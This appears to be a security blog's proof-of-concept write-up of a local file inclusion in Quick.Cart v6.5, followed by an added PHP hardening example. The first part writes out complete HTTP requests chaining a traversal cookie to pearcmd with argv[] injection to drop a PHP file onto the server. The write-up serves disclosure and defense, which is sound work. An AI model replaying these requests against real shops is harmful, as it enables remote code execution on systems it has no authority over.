IT Security Enthusiast

POC - Quick.Cart v6.5 - Local File Inclusion

[LFI] Quick.Cart v6.5

admin.php::
... SNIP ...
extract( $_GET );
define( 'ADMIN_PAGE', true );
... SNIP ...

Funny, passing user input directly to extract() x) We will need this later...

admin.php::
... SNIP ...
require 'database/config/general.php';
... SNIP ...

Let's dig in here :p

database/config/general.php::
... SNIP ...
$config['change_language_to_polish'] = true;
if( !defined( 'CUSTOMER_PAGE' ) && 
    !empty( $_SERVER['HTTP_ACCEPT_LANGUAGE'] ) && 
 $config['change_language_to_polish'] === true && 
 preg_match( '/pl-|pl,|^pl$/', $_SERVER['HTTP_ACCEPT_LANGUAGE'] ) ) {
... SNIP ...
  if( isset( $_COOKIE['sAdminLanguage'] ) )
    $config['admin_lang']= $_COOKIE['sAdminLanguage'];
... SNIP ...
require_once defined( 'CUSTOMER_PAGE' ) ? $config['dir_lang'].LANGUAGE.'.php' : ( is_file( $config['dir_lang'].$config['admin_lang'].'.php' ) ? $config['dir_lang'].$config['admin_lang'].'.php' : $config['dir_lang'].LANGUAGE.'.php' );
... SNIP ...

1. In "admin.php", CUSTOMER_PAGE is not defined
2. We can set the header "Accept-Language: pl-PL,pl;"
3. We control the cookies too

That means $config['admin_lang'] is under our control :D

So we can include any file whose name ends in ".php".
The path must point to a real file (is_file) -_-"
Actually nothing good to do with that alone...

Maybe we can use the PEAR sources :p

GET /qcv56/admin.php HTTP/1.1
Host: 127.0.0.1
Connection: close
Accept-Language: pl-PL,pl;
Cookie: sAdminLanguage=../../../../../../../../usr/lib/php/pearcmd;

Well done... let's use the extract($_GET) to pass arguments to PEAR:
-s -c ./files/83f2a5ec3fca.php -d preferred_mirror="<?php phpinfo() ?>"
Tricky :p ...

GET /qcv56/admin.php?argv[]=&argv[]=-s&argv[]=-c&argv[]=./files/83f2a5ec3fca.php&argv[]=-dpreferred_mirror=<?php%20phpinfo()%20?> HTTP/1.1
Host: 127.0.0.1
Connection: close
Accept-Language: pl-PL,pl;
Cookie: sAdminLanguage=../../../../../../../../usr/lib/php/pearcmd;

GET /qcv56/files/83f2a5ec3fca.php HTTP/1.1
Host: 127.0.0.1
Connection: close

file created :)
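The root cause is that a cookie value is concatenated into a require_once path with only an is_file() check. Below is an added example (not Quick.Cart code) of how that language lookup could be hardened: the cookie is treated as a key into a whitelist built from the files actually present in $config['dir_lang'], and never becomes part of a path. The function names and the temporary demo directory are my own.

```php
<?php
// Added example, not from Quick.Cart: safe replacement for the admin
// language resolution. Assumes language files live directly in $dirLang
// and are named like "pl.php", "en.php".

function allowed_admin_languages(string $dirLang): array {
    $langs = [];
    foreach (glob(rtrim($dirLang, '/') . '/*.php') as $file) {
        // basename() keeps only "pl", "en", ...; no directory parts survive
        $langs[] = basename($file, '.php');
    }
    return $langs;
}

function resolve_admin_lang_file(string $dirLang, ?string $requested, string $default): string {
    $allowed = allowed_admin_languages($dirLang);
    // Strict whitelist comparison: a value such as
    // "../../../../../../../../usr/lib/php/pearcmd" is never in the list,
    // so it falls back to the default instead of being used as a path.
    $lang = ($requested !== null && in_array($requested, $allowed, true))
        ? $requested
        : $default;
    return rtrim($dirLang, '/') . '/' . $lang . '.php';
}

// Constructed demo: a temporary language directory with two real files.
$dirLang = sys_get_temp_dir() . '/qc_lang_demo';
@mkdir($dirLang);
file_put_contents($dirLang . '/pl.php', "<?php\n");
file_put_contents($dirLang . '/en.php', "<?php\n");

$cases = [
    'pl',                                            // legitimate value
    '../../../../../../../../usr/lib/php/pearcmd',   // the traversal from the PoC
    'pl/../../database/config/general',              // traversal ending in an existing .php
];
foreach ($cases as $cookie) {
    // In the real application the value would come from $_COOKIE['sAdminLanguage'].
    echo str_pad($cookie, 48) . ' => ' . resolve_admin_lang_file($dirLang, $cookie, 'en') . PHP_EOL;
}
```

Dropping the extract($_GET) in admin.php removes the second half of the chain (the argv[] injection) independently of this fix.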
